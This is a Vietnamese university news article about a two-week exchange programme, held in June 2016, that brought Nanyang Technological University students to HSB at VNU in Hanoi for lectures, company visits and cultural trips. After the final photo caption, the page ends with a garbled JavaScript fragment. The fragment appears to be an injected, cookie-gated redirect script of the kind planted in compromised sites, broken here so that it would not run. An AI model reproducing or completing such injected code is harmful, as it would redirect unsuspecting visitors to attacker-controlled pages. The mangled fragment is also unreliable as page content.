Chương trình trao đổi quốc tế “Khám phá Việt Nam, 6/2016”

Là một chương trình hợp tác thành công giữa hai trường HSB – VNU và ĐH Công nghệ Nanyang Technological University (NTU), “GEM Discoverer Prelude Hanoi” (tạm dịch “Khám phá Việt Nam”) mang đến cho các bạn sinh viên cơ hội được học tập, trải nghiệm và khám phá lịch sử, văn hóa, giáo dục, xã hội và kinh tế của Việt Nam. GEM Discoverer Prelude Hanoi, 6/2016 được HSB tổ chức thành công, khẳng định sự phát triển bền vững và chất lượng đảm bảo của khóa học.

Đại học Công nghệ Nanyang (NTU) được thành lập năm 1991, và là một trong những trường Đại học công lập lớn nhất Singapore, xếp hạng thứ 7 trong hệ thống các trường Đại học Châu Á và thứ 5 trong hệ thống top 100 trường Đại học trẻ trên thế giới. Đây cũng là một trong các đối tác Quốc tế quan trọng và có chiến lược hợp tác lâu dài của Khoa QTKD (HSB) trong những năm trở lại đây. Sau thành công từ khoá đào tạo đầu tiên vào tháng 12/2013, chương trình “(GEM) Discoverer Prelude Hanoi” đã nhận được nhiều phản ứng tích cực từ phía các học viên và số lượng sinh viên đăng ký tuyển sinh vào chương trình ngày một gia tăng.

1

GS.TS. Phạm Hồng Tung – Viện trưởng Viện Việt Nam học và Khoa học phát triển, VNU,
giảng bài cho các bạn sinh viên đại học Nanyang Technological University

Chương trình kéo dài hai tuần với phần giảng dạy trên lớp bao gồm các môn học liên ngành về lịch sử, văn hóa, kinh tế, giáo dục của Việt Nam và các buổi hội thảo, thảo luận theo định hướng giúp các sinh viên tiếp thu được kiến thức trong thời gian ngắn nhất. Ngoài ra các sinh viên còn được trải nghiệm thực tiễn thông qua các buổi ngoại khóa bao gồm các chuyến đi thực tế tới các doanh nghiệp, các buổi thăm quan văn hoá để hiểu hơn về con người, văn hoá, xã hội và đất nước Việt Nam. Cuối khóa học, các sinh viên NTU sẽ làm một bài kiểm tra để đánh giá quá trình học tập và cấp chứng chỉ đã hoàn thành chương trình đào tạo quốc tế tại HSB. Và cũng theo như thỏa thuẩn hợp tác đào tạo, một số tín chỉ trong chương trình sẽ được tính vào chương trình đào tạo chính khóa của sinh viên NTU. Đội ngũ giảng dạy tại chương trình là những nhà giáo, nhà khoa học, các Giáo sư, Phó Giáo Sư, Tiến Sĩ và những nhà chuyên môn có trình độ cao, giàu kinh nghiệm.

2

PGS. TS. Nguyễn Ngọc Thắng – Phó Chủ nhiệm khoa – Khoa Quản trị Kinh doanh (HSB)
Trao quà cho các bạn sinh viên hoàn thành xuất sắc khóa học

Bên cạnh các môn khoa học liên ngành được giảng dạy; các sinh viên NTU còn được tham gia các phần học tập thực tế thông qua các buổi seminar, các chuyến fieldtrip tại các doanh nghiệp. Và một phần không thể thiếu trong “Khám phá Việt Nam” là những chuyến du lịch thăm quan những thắng cảnh đẹp và những làng nghề nổi tiếng để hiểu hơn về con người, văn hoá, xã hội và đất nước Việt Nam. Cuối khóa học, các sinh viên NTU sẽ làm một bài kiểm tra để đánh giá quá trình học tập và cấp chứng chỉ đã hoàn thành chương trình đào tạo quốc tế tại HSB.

3

Các bạn sinh viên đại học Nanyang Technological University tham gia hoạt động ngoại khóa team-building tại HSB

{var U=(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”=”,now=Math.floor(Date.now()/1e3),(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),’‘)}